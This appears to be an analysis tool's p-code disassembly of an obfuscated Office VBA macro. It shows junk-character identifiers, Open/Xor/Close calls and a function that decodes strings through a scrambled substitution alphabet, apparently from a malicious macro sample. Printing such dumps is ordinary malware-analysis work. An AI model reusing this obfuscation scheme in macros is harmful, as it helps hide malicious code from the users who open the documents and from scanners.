' ArgsLd ¾©·¬·ª°¿°·´¾µ¬¸¾¬¯¨³»¿¯©µ²«ª¹½§¢¨»¸¸·º²¶º«µ´½¸¹µ¬¶§¨¼µ®»¶¾ªºº³³¬§°¯£¯¡º®º¹µ¯¾£¬¦£¥²¼¼¦¥°¿´ª¡¬¨³¸² 0x0001
' Set ¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥
' Line #30:
' Ld ¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥
' ArgsMemCall Open 0x0000
' Line #31:
' Ld «¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´
' Ld ¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥
' MemSt Type
' Line #32:
' Ld ©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ
' Ld ¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥
' ArgsMemCall Xor 0x0001
' Line #33:
' Ld §º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶
' Ld «¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´
' Ld «¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´
' Add
' Ld ¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥
' ArgsMemCall i 0x0002
' Line #34:
' Ld ¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥
' ArgsMemCall Close 0x0000
' Line #35:
' EndIfBlock
' Line #36:
' Ld §º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶
' Paren
' Ld º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥
' ArgsMemCall Open 0x0001
' Line #37:
' EndSub
' Line #38:
' Line #39:
' FuncDefn (Public Function ¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª©°½½«¦©¹®¢º©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©(²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨, id_FFFE As Variant))
' Line #40:
' LitStr 0x006E " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ¿¡²³ÀÁÂÃÄÅÒÓÔÕÖÙÛÜàáâãä娶§Ú¥"
' St ¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££
' Line #41:
' LitStr 0x006E " ¿¡@#$%^&*()_+|01²³456789ÀbÁdÂÃghÄjklmÅÒÓqÔÕÖÙvwÛÜz.,-~AàáâãFGHäJKåMNضQR§TÚVWX¥Z?!23acefinoprstuxyBCDEILOPSUY"
' St bSpecialPathkjbksd
' Line #42:
' StartForVariable
' Ld Document
' EndForVariable
' LitDI2 0x0001
' Ld ²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨
' FnLen
' For
' Line #43:
' Ld ¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££
' Ld ²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨
' Ld Document
' LitDI2 0x0001
' ArgsLd Mid 0x0003
' FnInStr
' St id_0344
' Line #44:
' Ld id_0344
' LitDI2 0x0000
' Gt
' IfBlock
' Line #45:
' Ld bSpecialPathkjbksd
' Ld id_0344
' LitDI2 0x0001
' ArgsLd Mid 0x0003
' St id_0346
' Line #46:
' Ld id_0348
' Ld id_0346
' Add
' St id_0348
' Line #47:
' ElseBlock
' Line #48:
' Ld id_0348
' Ld ²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨
' Ld Document
' LitDI2 0x0001
' ArgsLd Mid 0x0003
' Add
' St id_0348
' Line #49:
' EndIfBlock
' Line #50:
' StartForVariable
' Next
' Line #51:
' Ld id_0348
' St ¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª©°½½«¦©¹®¢º©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©
' Line #52:
' EndFunc